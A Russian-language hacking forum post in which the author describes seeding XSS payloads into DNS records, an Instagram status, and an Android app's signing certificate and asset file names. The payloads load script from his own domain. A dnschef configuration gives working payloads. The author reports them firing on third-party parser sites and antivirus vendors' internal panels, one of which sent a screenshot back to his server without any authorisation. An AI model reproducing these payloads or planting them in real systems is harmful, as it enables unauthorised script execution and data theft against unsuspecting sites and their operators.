Приключения xss векторов в необычных местах

Admin

Original poster
Administrator
Сообщения
912
Реакции
730
Посетить сайт
Привет! Хочу рассказать о нескольких случаях, когда ресурсы сами собирали данные, но некорректно их обрабатывали. Причём в некоторых случаях, данные представлены в безопасном виде, но за счет парсинга и дальнейшей обработки когда-то безопасная строка превращается в атакующий вектор. На серьезность статьи не претендую, все забавы ради, как в старые — добрые времена.
Если загуглить XSS via DNS, то ты найдешь

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

на эту тему, когда в качестве TXT записи отдается атакующий вектор.
Но создать TXT запись можно в любой хостинг-панели и XSS там висит с времен создания блога.
А почему никто не вспомнил про другие виды записей, скажем, CNAME или NS? Но для того, чтобы вернуть в качестве доменов атакующие вектора, можно создать собственный NS-сервер.
Отличным решением было использование

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Я взял поддомен hack.ufolabs.pro (можно было любой свой домен), в качестве name server’а указал собственный ip. Всё.

Теперь мы рулим настройками, которые в dnschef.ini, поэтому пишем туда:
Код:
[MX] *.xss.hack.ufolabs.pro="-->'><script/src=//ufolabs.pro/xss.js>
[NS] *.xss.hack.ufolabs.pro="-->'><script/src=//ufolabs.pro/xss.js>
[CNAME] *.xss.hack.ufolabs.pro="-->'><script/src=//ufolabs.pro/xss.js>

Теперь, если ресурс берет данные из DNS и помещает на страницу — есть вероятность, что про фильтрацию пользовательских данных он забыл.
dig.jpg
Примеры, где работает XSS:
Забавы ради я как-то добавил XSS в статус инстаграма. Ничего в этом такого нет, но стоит заметить, что сам вектор атаки был безопасен (на странице instagram).​
instagram.jpg
Но по логам — начали срабатывать XSS’ки на различных доменах, это были парсеры соцсети и какие-то аналитические сервисы. Вот пример доменов:
  • findgram.me
  • imgrab.com
  • instagy.com
  • iconosquare.com
  • tofo.me
  • photo.sh
  • gramosphere.com
Часть из них баги уже исправили, но то что было в логах — пусть будет тут.


Недавно постучал @Black2Fan и спрашивает, а есть ли у меня android приложение с XSS в Google Play :D?
А что, можно было? А давай сделаем! Где-нибудь да и стрельнет (а вдруг где-то у googl’а).
Итак, был сгенерирован сертификат, подписывающий приложение, только вместо имени разработчика и прочих данных — XSS
virustotal.jpg
Были разложены файлы с «заначками», и файлы, путь из которых формирует валидный тег, подгружающий скрипт с моего домена.
Напомню, что в именах файлов можно использовать спецсимволы (в linux), кому интересно — гляньте папку assets.

Но вот беда, чтобы внедрить свой скрипт в имя, нужно домен покороче, ибо ограничение в 30 символов. Под рукой короткого домена, естественно, небыло. Если все одно-двусимвольные домены уже зарегистрированны — еще не все потеряно. В современных интернетах уже давно используются punycode, и регистрировать такие домены можно, и в настоящий момент заняты не все смайлики.
Например, последовательность xn--g3h дает . Вот я и зарегистрировал домен — .ws (4 символа включая точку).
google-play.jpg
В первую очередь отстук пришёл с парсеров приложений, больше всего трафика с данных доменов:
  • apkpure.com
  • allfreeapk.com
  • appbrain.com
  • appszoom.com
  • downloadatoz.com
Помимо этого, всякие сканеры приложений, декомпиляторы apk, ну и всякое по мелочи.
Один из примеров —

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, который ищет уязвимости в мобильных приложениях. Тем временем, приложение

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

в нём:woot:
Но самое забавное — после того, как приложение было отправлено на virustotal, XSS сработали в панелях антивирусных компаний.
  1. Поддомен Qihoo 360 — создатели антивируса 360 Total Security
  2. Поддомен Antiy Labs — создатели антивируса AVL (красивая панелька, интеграция с Jira)
Обе панели на PHP, и обе компании из Китая, большая часть данных экранируется, но где-то да и проскочет вектор, который отправил «снимок экрана» мне на сервер. Не bugbounty, но все же забавно.
Еще одно замечание, в зависимости от перевода — в описание приложения проходит тег , попробуй что-нибудь с этим сделать, а вдруг
2.jpg
Нужно больше золота забавных исследований. XSS-ки всегда будут актуальны, тем более это легко.
 
Последнее редактирование:
  • Like
Реакции: Kpa6 и BuriTTo
Название темы
Автор Заголовок Раздел Ответы Дата
9779 Интересно XSS, или как получить халявные cookie Ч1. Уязвимости и взлом 10
F XSS - Сборник инструментов Уязвимости и взлом 0
Forevonly Руководство по применению: как обойти XSS-фильтры Полезные статьи 0
klobald Уроки по XSS: Урок 3. Контексты внедрения XSS Уязвимости и взлом 0
klobald Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф Уязвимости и взлом 0
klobald Уроки по XSS: Урок 1. Основы XSS и поиск уязвимых к XSS сайтов Уязвимости и взлом 0
Forevonly Skipfish - Сканер безопасности веб-приложений для определения XSS, SQL инъекции, а также Shell инъекции Kali Linux 0
X нашел xss , что делать дальше? Вопросы и интересы 0
Admin XSS атаки с помощью Referer'а Уязвимости и взлом 0
ins1der Инжектим скрипт beef используя XSS Полезные статьи 4
pw0ned Golden-Bird.biz XSS Другое 4
Admin Cyber Industries - Активная XSS Уязвимости и взлом 0
Admin Выжимаем максимум пользы от XSS Уязвимости и взлом 1
Admin Hotmail - xss Уязвимости и взлом 0
Admin Mail ru - xss Уязвимости и взлом 1
Admin Несколько векторов обхода для Incapsula WAF Уязвимости и взлом 1

Название темы